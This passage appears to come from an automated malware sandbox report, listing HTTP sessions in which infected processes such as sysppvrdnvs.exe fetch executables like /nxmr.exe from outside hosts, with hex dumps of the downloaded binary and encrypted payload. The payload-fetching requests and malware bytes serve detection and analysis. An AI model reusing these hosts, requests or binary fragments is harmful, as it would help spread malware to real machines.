                                                                                                                                                                                                    Data Ascii: =$6KbMU{qgz{VUWDW}P]sTK3ZW%zh"eRb#mHc,~ |Qp[W;!i"RABtFjs_K(5jR,WeADn~Z8:p^5CLV`YuW>ty\'J04?=HTic81;VS|ThyT+mqBLkO!{LbR<WPO(rVc=Tb''+DZE"rJ:h}nw1~z:/;fwH`^D|%F8MD)A_uhi\:h%~!a>&cbV)g$V]Bg1v@%<+({Ps?'f#[V>%}sKu~gWA09-#98wSKfvZgi<)X>rRj9[t6'G*\3+veYh_9^H-'BIh=M8Nz-nt>+yJMpWPLkPyW"y~&ecMz6sC!J`mS?2"OR]N xcxkit9f#:a#C"Ql0p{{rtE:r:'lL]!poXAdOq'Fa|yM{x;!++H.}bpp8h;qLLa<x<j


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    7192.168.2.854299185.215.113.84803396C:\Users\user\AppData\Local\Temp\28849683.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Oct 26, 2024 07:27:10.959135056 CEST177OUTGET /nxmr.exe HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                                                                    Host: 185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:11.869560957 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:27:11 GMT
                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                    Content-Length: 5827584
                                                                                                                                                                                                    Last-Modified: Fri, 27 Sep 2024 20:03:46 GMT
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    ETag: "66f70fa2-58ec00"
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 b7 01 f7 66 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 26 00 94 01 00 00 e8 58 00 00 1e 00 00 b0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 70 59 00 00 04 00 00 91 87 59 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 20 59 00 34 0a 00 00 00 50 59 00 80 03 00 00 00 d0 58 00 58 11 00 00 00 00 00 00 00 00 00 00 00 60 59 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 b7 [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdf.&X@pYY` Y4PYXX`Y0X("YP.textP``.dataVV@.rdata9X:xX@@.pdataXXX@@.xdataXX@@.bssY.idata4 YX@.CRT`0YX@.tls@YX@.rsrcPYX@.reloc0`YX@B
                                                                                                                                                                                                    Oct 26, 2024 07:27:11.869590044 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c3 0f 1f 44 00 00 66 2e 0f 1f 84 00 00 00 00 00 48 83 ec 28 48 8b 05 75 b1
                                                                                                                                                                                                    Data Ascii: Df.H(HuX1HvXHyXHXf8MZuHcP<H8PEtfHXXuCqTkHXTkHXdHmX8tI1H(p
                                                                                                                                                                                                    Oct 26, 2024 07:27:11.869611025 CEST1236INData Raw: fd ff ff 89 c1 e8 2b 6d 01 00 90 66 2e 0f 1f 84 00 00 00 00 00 48 83 ec 28 48 8b 05 c5 ac 58 00 c7 00 01 00 00 00 e8 ba fc ff ff 90 90 48 83 c4 28 c3 0f 1f 00 48 83 ec 28 48 8b 05 a5 ac 58 00 c7 00 00 00 00 00 e8 9a fc ff ff 90 90 48 83 c4 28 c3
                                                                                                                                                                                                    Data Ascii: +mf.H(HXH(H(HXH(H(lHH(H@HIXHP!HH9uHXHPfHH9uHXHPfHH9uH}XHPfH
                                                                                                                                                                                                    Oct 26, 2024 07:27:11.869647026 CEST336INData Raw: d6 4c 89 c5 4d 89 cc 48 8d 7c 24 20 41 b8 08 02 00 00 ba 00 00 00 00 48 89 f9 e8 9a 68 01 00 4d 89 e0 48 89 ea 48 89 f9 e8 34 28 00 00 89 f2 48 89 d9 e8 35 fe ff ff 41 89 f0 48 89 da 48 89 f9 e8 c8 35 00 00 90 48 81 c4 30 02 00 00 5b 5e 5f 5d 41
                                                                                                                                                                                                    Data Ascii: LMH|$ AHhMHH4(H5AHH5H0[^_]A\UWVSHH)H$8H$8A6>HH@ HH$0Agf$Pf$R f$Tf$Vf$Xf$Z
                                                                                                                                                                                                    Oct 26, 2024 07:27:11.869662046 CEST1236INData Raw: 94 44 50 01 00 00 66 89 14 41 48 83 c0 01 48 83 f8 0c 75 ea c6 05 5e f2 58 00 01 48 8d 0d 67 fa ff ff e8 0a fa ff ff 80 3d 6b f2 58 00 00 74 29 48 8d 15 4a f2 58 00 48 8d 4a 18 0f b7 02 66 2d c7 26 66 25 ff 00 66 89 02 48 83 c2 02 48 39 ca 75 e9
                                                                                                                                                                                                    Data Ascii: DPfAHHu^XHg=kXt)HJXHJf-&f%fHH9u@XH!XH/HH$01gH$ Aff$Pf$Rf$Tf$Vf$Xf$Zf$\f$^df$`cf$b1
                                                                                                                                                                                                    Oct 26, 2024 07:27:11.869678020 CEST1236INData Raw: 00 66 c7 84 24 50 01 00 00 a9 00 66 c7 84 24 52 01 00 00 b0 00 66 c7 84 24 54 01 00 00 bc 00 66 c7 84 24 56 01 00 00 bb 00 66 c7 84 24 58 01 00 00 b5 00 66 c7 84 24 5a 01 00 00 bc 00 66 c7 84 24 5c 01 00 00 c0 00 66 c7 84 24 5e 01 00 00 c1 00 66
                                                                                                                                                                                                    Data Ascii: f$Pf$Rf$Tf$Vf$Xf$Zf$\f$^f$`{f$bf$df$ff$hM=CXu<dXH>XDPfAHHuXHZ=(Xt)HXHJfAf%fHH9u
                                                                                                                                                                                                    Oct 26, 2024 07:27:11.869724989 CEST1236INData Raw: c7 84 24 96 01 00 00 30 00 66 c7 84 24 98 01 00 00 43 00 66 c7 84 24 9a 01 00 00 3a 00 66 c7 84 24 9c 01 00 00 34 00 66 c7 84 24 9e 01 00 00 3f 00 66 c7 84 24 a0 01 00 00 fb 00 66 c7 84 24 a2 01 00 00 32 00 66 c7 84 24 a4 01 00 00 45 00 66 c7 84
                                                                                                                                                                                                    Data Ascii: $0f$Cf$:f$4f$?f$f$2f$Ef$2f$=Xu<XHXDPfAHH-ueXH=Xt)HaXHJZf-Jf%fHH9uXf$P"f$R f$T
                                                                                                                                                                                                    Oct 26, 2024 07:27:11.869740963 CEST1236INData Raw: 44 24 28 48 89 44 24 20 49 89 f1 4c 8d 05 d3 86 01 00 48 8d 15 8c db 58 00 e8 1e ee ff ff e8 b9 0f 00 00 89 c6 48 8d 8c 24 b0 05 00 00 41 b8 08 02 00 00 ba 00 00 00 00 e8 b0 58 01 00 66 c7 84 24 50 01 00 00 45 00 66 c7 84 24 52 01 00 00 30 00 66
                                                                                                                                                                                                    Data Ascii: D$(HD$ ILHXH$AXf$PEf$R0f$TXf$VXf$XPf$ZUf$\Nf$^Ef$`5f$bRf$dKf$f\f$hEf$j=}Xu<XHpXDPfAH
                                                                                                                                                                                                    Oct 26, 2024 07:27:11.869756937 CEST848INData Raw: 00 00 54 00 66 c7 84 24 8e 01 00 00 3f 00 66 c7 84 24 90 01 00 00 4e 00 66 c7 84 24 92 01 00 00 57 00 66 c7 84 24 94 01 00 00 dd 00 80 3d a6 d5 58 00 00 75 3c c6 05 fb d5 58 00 01 b8 00 00 00 00 48 8d 0d a9 d5 58 00 0f b7 94 44 50 01 00 00 66 89
                                                                                                                                                                                                    Data Ascii: Tf$?f$Nf$Wf$=Xu<XHXDPfAHH#utXHp=Xt)HpXHJFf-f%fHH9uXf$P9f$RAf$TTf$VJf$Xf$ZBf$\Uf$^B
                                                                                                                                                                                                    Oct 26, 2024 07:27:11.869772911 CEST1236INData Raw: 00 0f b7 54 44 60 66 89 14 41 48 83 c0 01 48 83 f8 09 75 ed c6 05 4e d5 58 00 01 48 8d 0d b5 e4 ff ff e8 6a e3 ff ff 80 3d 55 d5 58 00 00 74 29 48 8d 15 3a d5 58 00 48 8d 4a 12 0f b7 02 66 2d 8d 7a 66 25 ff 00 66 89 02 48 83 c2 02 48 39 ca 75 e9
                                                                                                                                                                                                    Data Ascii: TD`fAHHuNXHj=UXt)H:XHJf-zf%fHH9u*XH$ H$PLXH|$`H5eX=Xu9XHXTD`fAHHquXH,=Xt,HXHf}f%fH
                                                                                                                                                                                                    Oct 26, 2024 07:27:11.875000000 CEST1236INData Raw: 25 ff 00 66 89 02 48 83 c2 02 48 39 ca 75 e9 c6 05 73 cf 58 00 00 48 8d 94 24 20 14 00 00 48 8d 8c 24 50 01 00 00 4c 8d 05 40 cf 58 00 e8 6b 0b 00 00 66 c7 44 24 60 76 00 66 c7 44 24 62 a4 00 66 c7 44 24 64 71 00 66 c7 44 24 66 80 00 66 c7 44 24
                                                                                                                                                                                                    Data Ascii: %fHH9usXH$ H$PL@XkfD$`vfD$bfD$dqfD$ffD$hfD$jfD$lfD$nqfD$pfD$rfD$tfD$vqfD$xsfD$zfD$|fD$~f$f$f$f$f$f$f$qf$f


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    8192.168.2.854300185.215.113.6680760C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.183058977 CEST166OUTGET /5 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:27:14.105381966 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:27:13 GMT
                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                    Content-Length: 13568
                                                                                                                                                                                                    Last-Modified: Tue, 22 Oct 2024 12:10:16 GMT
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    ETag: "67179628-3500"
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Data Raw: 0c 11 18 17 3d 7f 82 02 a6 24 36 4b 11 62 4d 55 d2 81 18 a8 7b ac b4 99 13 ea 95 14 cc 97 97 e2 0a 71 67 8a f6 90 c5 ca 7a 7b 56 bb fa e8 89 09 55 1a 05 57 8f 9c 1a 81 d8 bb 44 82 88 57 06 b0 a8 b1 0d 7d 50 5d 73 d2 54 4b d9 0b b0 cd a7 15 33 5a 57 25 7a d1 92 b0 cc 68 22 98 ff fd 1b 98 b0 f5 65 52 62 23 6d 48 84 63 2c a5 ce 1c d7 7e 20 81 7c 51 12 ee 07 70 82 1e bb bd 5b c1 57 cc 9f 3b 07 de 21 89 69 22 52 a2 b3 ac 41 42 e4 9f 74 46 e4 c5 ff 6a 73 b7 e0 c8 5f 4b 1f cc 28 e3 35 c9 6a 94 90 c9 95 c3 85 52 2c ae 57 13 b6 c7 b3 65 41 44 cb 6e cf 7e 5a 38 88 3a 70 d6 16 06 5e 35 43 a9 4c 56 d1 91 19 cf 12 60 0e f4 0e 93 ce ed f1 59 ab 0f ac b8 08 db 75 8f 57 bd 3e 74 90 a5 b5 79 a1 e7 5c 27 4a 05 b2 04 bb fc f0 de 98 12 16 00 a4 94 30 c4 34 a7 3f 3d d1 48 9d 54 69 63 38 91 b3 31 0e e5 1c 1b 3b 56 e3 53 a0 7c af cd 1f e8 b5 94 ca 54 f5 68 9c e2 81 d7 79 54 fc 2b 6d ba e7 01 91 17 71 86 42 4c 6b dd ff 4f a6 b4 df 21 b1 1d aa 7b 15 e2 4c ad c1 62 52 91 b1 1e ba e8 86 3c 96 57 ad 50 ef 4f 07 df 8e c3 28 72 [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: =$6KbMU{qgz{VUWDW}P]sTK3ZW%zh"eRb#mHc,~ |Qp[W;!i"RABtFjs_K(5jR,WeADn~Z8:p^5CLV`YuW>ty\'J04?=HTic81;VS|ThyT+mqBLkO!{LbR<WPO(rVc=Tb''+DZE"rJ:h}nw1~z:/;fwH`^D|%F8MD)A_uhi\:h%~!a>&cbV)g$V]Bg1v@%<+({Ps?'f#[V>%}sKu~gWA09-#98wSKfvZgi<)X>rRj9[t6'G*\3+veYh_9^H-'BIh=M8Nz-nt>+yJMpWPLkPyW"y~&ecMz6sC!J`mS?2"OR]N xcxkit9f#:a#C"Ql0p{{rtE:r:'lL]!poXAdOq'Fa|yM{x;!++H.}bpp8h;qLLa<x<j
                                                                                                                                                                                                    Oct 26, 2024 07:27:14.105540991 CEST1236INData Raw: c5 f6 81 b2 5c be 3a f2 f4 a0 69 51 cb 1e 7a 65 63 1b 5e ad 0c 1e cb bc 15 0c c8 3c fd 96 62 f2 d2 3b 0a d0 1e 9d 66 0c cb 26 ef d1 f3 6e 2b c7 40 85 15 6d 0d 88 4b f9 89 10 2c 37 76 33 d6 5d a0 0a 79 c4 65 0a bc ad 27 98 0e b2 33 fc 54 5c f2 dd
                                                                                                                                                                                                    Data Ascii: \:iQzec^<b;f&n+@mK,7v3]ye'3T\*Sk}):rN]WO]1G>&!>dK*@i[]LzA)0N$w|n=29-BB){&ZI2ej` t
                                                                                                                                                                                                    Oct 26, 2024 07:27:14.105554104 CEST1236INData Raw: f7 13 67 9e cd 6e f9 15 fc 3a cd df 70 8b 42 7b de a4 ca 85 57 6a 71 26 75 81 f0 54 29 ef 09 6e c9 67 f3 87 95 29 ab 8b 20 15 88 7f 2e 3e 35 68 a8 79 d1 4a b4 83 de db 9a ba b6 0b d8 d5 6f f0 69 be 83 27 84 f0 7c a3 ae 2f 39 57 5b 8d 33 ac 48 b0
                                                                                                                                                                                                    Data Ascii: gn:pB{Wjq&uT)ng) .>5hyJoi'|/9W[3H8 lyac&_ n3SABCwJv1s>psfyFOCHi_R7GL.@])H1Kr:s']@-:N
                                                                                                                                                                                                    Oct 26, 2024 07:27:14.105565071 CEST1236INData Raw: d2 4a 56 de 57 c3 ea d0 22 22 9d cc dc 3c ca 35 31 d3 61 85 08 f5 9f fd 16 26 8b b7 6f d5 de 4c 13 9f 8f dd b4 b0 9a ff 80 26 9c cc 0d d1 79 f4 a8 10 c7 cc ae 8e e1 17 2a 60 f3 ad e7 14 e6 4d 63 fa 32 2d 93 b0 26 a0 53 b7 8b 8e 0a 17 0f a2 67 2f
                                                                                                                                                                                                    Data Ascii: JVW""<51a&oL&y*`Mc2-&Sg/ZxX&V@cXvzn-")IDV0]D^bBV}]I&ssdw.$ne1UM?tIC(`mCy`OG*Kz8lCtli"
                                                                                                                                                                                                    Oct 26, 2024 07:27:14.105581999 CEST1236INData Raw: 9d f1 08 e9 03 03 32 8c 18 8d 6b c3 5b 1a f3 3c 82 14 7b 8f 5b 93 76 07 be c3 01 c2 38 8c 6f 5c 35 c5 2b 79 2a 76 7d a3 d9 62 74 d9 34 95 ec 27 21 6a 12 bc f0 fe 50 ce 41 c8 1a f7 05 fb 96 0b d4 b5 fa c6 b1 84 db e3 99 8b c7 63 ee 22 8a 6a ac ca
                                                                                                                                                                                                    Data Ascii: 2k[<{[v8o\5+y*v}bt4'!jPAc"jpy?\Y'4oX"j)ha-N7{h|s[X!`~vz$6b1oqUXH10>&{gJ.pSmw2X
                                                                                                                                                                                                    Oct 26, 2024 07:27:14.105593920 CEST1236INData Raw: a1 b1 55 45 a7 9d fa e3 d1 3c 22 b6 bf 71 1f 42 cc ec 36 12 ba f0 44 79 85 ec 96 77 a2 b1 72 f9 a9 a5 63 47 ef 43 09 ce 76 65 87 be 4c 6c 32 c7 4a d4 51 ca 8c c3 1b ac a3 4c a6 23 54 7a 83 1b f7 4e 74 41 8a 1b 63 bc 44 d9 c8 1c 28 d0 d6 5f 71 95
                                                                                                                                                                                                    Data Ascii: UE<"qB6DywrcGCveLl2JQL#TzNtAcD(_q9OW), S\m?^0&,\a{ k`SJPs;r3axIXC/QUS"mda*$n&E%@HUNX `C@Hu
                                                                                                                                                                                                    Oct 26, 2024 07:27:14.105606079 CEST1236INData Raw: f8 2e e9 92 fb 83 0f 4c d8 df a0 e8 d0 0c ed f3 c5 08 1e 25 7a 36 ae 9e 4b 91 f5 c2 28 00 33 53 7b 7d a4 bd f4 20 1d 35 d9 92 93 dc b4 28 53 57 61 80 fa 6b 96 a6 64 da d0 aa 6c 82 67 e1 6a 22 8b e0 39 c8 6c f3 3e 1e 5d 5d 0e cf 6a ac 6a c8 ad e6
                                                                                                                                                                                                    Data Ascii: .L%z6K(3S{} 5(SWakdlgj"9l>]]jjEUjC Wx}eqg9+:5b'Ei>yZl5e{`H5JSRa*j+%{w@`4Q9o@sHt4'C<*GKD>(vhM@XX
                                                                                                                                                                                                    Oct 26, 2024 07:27:14.105621099 CEST1236INData Raw: d0 6b e2 21 cf 15 28 20 72 f7 fc 57 4f 73 94 ca 76 b0 86 c8 3c c7 a4 2f eb 45 f5 e3 01 73 8d af d7 a1 5e 8f ee e9 ab 57 aa 69 e0 1e d3 3c c2 9e f8 11 17 02 78 2d 1d ef 76 a4 c5 15 4c 2d 42 27 09 12 e5 65 6f 2f 64 31 88 32 c2 1e 20 20 60 67 b4 3a
                                                                                                                                                                                                    Data Ascii: k!( rWOsv</Es^Wi<x-vL-B'eo/d12 `g:uBO4O}~rzd'()%_JIoC_^* L]C\N\p+lJh@gETitL?.q>UKx!GCAyIl&m1`p
                                                                                                                                                                                                    Oct 26, 2024 07:27:14.105632067 CEST1236INData Raw: fe 7f b9 42 0e 61 2d ad 12 06 26 54 54 d1 48 44 27 8e 59 c0 e3 2c de d9 4e 69 84 91 09 95 6b 82 8d e2 19 cf aa 9a 17 6d a9 13 30 b6 37 3c 92 17 ab 47 89 2f a9 70 c6 10 e2 d3 7b 07 e0 67 12 54 0e 7f 60 ab b2 a0 9e 3a 34 48 5b 1f 83 7e 9c cd 11 99
                                                                                                                                                                                                    Data Ascii: Ba-&TTHD'Y,Nikm07<G/p{gT`:4H[~"{dVaZVVZgfiGi}Sd:&a\Z7a" ')\{*wcb<zosz|TLU"bF<h1'</;u#|>h,TlF]
                                                                                                                                                                                                    Oct 26, 2024 07:27:14.105643034 CEST1236INData Raw: 45 52 ae 09 6f bf d3 d7 12 a4 d5 e7 2c 80 b9 57 f5 09 2c c7 70 97 05 2a 3a f8 65 e8 61 e8 9c e0 d9 ad c8 2a 52 a1 9a f0 4e e9 8a 25 45 3b dd e2 60 73 a4 ec b7 6c 88 b6 7f 07 9f a0 bf bf 13 1b fe b5 c2 2c d5 4a 2e 15 bc 84 a2 02 05 8e 94 56 f0 45
                                                                                                                                                                                                    Data Ascii: ERo,W,p*:ea*RN%E;`sl,J.VEEHgP[_ay"X^UdtjkO`KWPC%e=>e\?Wq`h%sNYIuWm@^\bEkG1m,lK
                                                                                                                                                                                                    Oct 26, 2024 07:27:14.110868931 CEST1120INData Raw: 9b 5e 69 f4 11 17 55 bf 68 92 21 84 b0 09 64 fd 9d 98 94 75 3a cf 5a 74 f7 01 f1 17 0e c9 0c 39 c0 4c 06 71 a9 78 43 32 6f 20 6c 74 57 01 e4 50 7b f9 55 af 81 f3 a4 b0 7d 50 16 89 62 95 45 19 cf 1a d2 d7 ae 8f 59 7e b9 26 37 a2 43 1d d0 3b 89 7e
                                                                                                                                                                                                    Data Ascii: ^iUh!du:Zt9LqxC2o ltWP{U}PbEY~&7C;~,.wAX-=Y_M"uQ iYtUlg#lW1i.Q7bDDV@*-,s%2?Ne?wL0H5ei^sPLQN


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    9192.168.2.85430291.202.233.141806636C:\Users\user\AppData\Local\Temp\15714163.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Oct 26, 2024 07:27:19.627783060 CEST182OUTGET /ALLBSTATAASASD HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                                                                                                                                    Host: 91.202.233.141
                                                                                                                                                                                                    Oct 26, 2024 07:27:20.555638075 CEST728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:27:20 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 564
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    10192.168.2.85430391.202.233.14180760C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Oct 26, 2024 07:27:21.607356071 CEST166OUTGET /1 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 91.202.233.141
                                                                                                                                                                                                    Oct 26, 2024 07:27:22.508054018 CEST728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:27:22 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 564
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                    Oct 26, 2024 07:27:24.536775112 CEST166OUTGET /2 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 91.202.233.141
                                                                                                                                                                                                    Oct 26, 2024 07:27:24.810069084 CEST728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:27:24 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 564
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
